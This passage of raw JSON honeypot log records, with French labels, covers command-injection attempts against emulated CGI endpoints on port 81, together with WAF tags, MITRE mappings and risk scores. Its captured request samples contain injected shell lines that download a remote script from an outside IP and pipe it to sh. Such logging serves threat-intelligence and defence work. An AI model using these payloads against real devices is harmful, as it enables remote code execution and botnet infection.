Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":325},{"id":11860773,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59946,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/adm.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00227981228fb9061b584c46dcd5df6396237d7cf2ae\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 330, \u0022payload_entropy\u0022: 5.2171547360709765, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002244975a8c148732922162b31805f6d2dc4dff1863\u0022, \u0022event_fingerprint\u0022: \u00227a31df1108e78d2ba3d31de0093cb4cb073c6675\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222c168cef2172786e024a35a75377d8e7\u0022, \u0022path_pattern_hash\u0022: \u00224861580e8d67a9feec8ee9a93d4f87e4\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConnection: close\\r\\n\\r\\nreboot_enabled=1\u0026reboot_time=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr3;busybox wget http:\/\/91.92.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConnection: close\\r\\n\\r\\nreboot_enabled=1\u0026reboot_time=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr3;busybox wget http:\/\/91.92.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022b062f9d88f6dab4f759ba544a32380528ea3fd96\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/adm.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/adm.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":330},{"id":11860774,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59958,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":20,"waf_tags":"[\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/makeRequest.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00222987d81543152395f8d92ae32869bdb75f8740c3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 183, \u0022payload_entropy\u0022: 5.19089050299124, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 88.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 62, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d43767e07cd7b47dbbdd9245c983eb18f4fe539d\u0022, \u0022event_fingerprint\u0022: \u00220359627dc238b5372eafbdc21e32c76edb7f1c32\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 224, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 62}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022371583b77ad1918df3c439d936024773\u0022, \u0022path_pattern_hash\u0022: \u00229e07efe7b4bc2ac9c18d5d90eb43e4ff\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 62}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022waf_tags\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022rce-5\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\\r\\nConnection: close\\r\\n\\r\\ndate=wget 91.92.40.118\/r|sh -s w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022waf_tags\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022rce-5\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\\r\\nConnection: close\\r\\n\\r\\ndate=wget 91.92.40.118\/r|sh -s w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022c4dd14203948477d127c7196ed8f7e845cb33bc2\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/makeRequest.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 62\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 62}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 62, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0775\u0022, 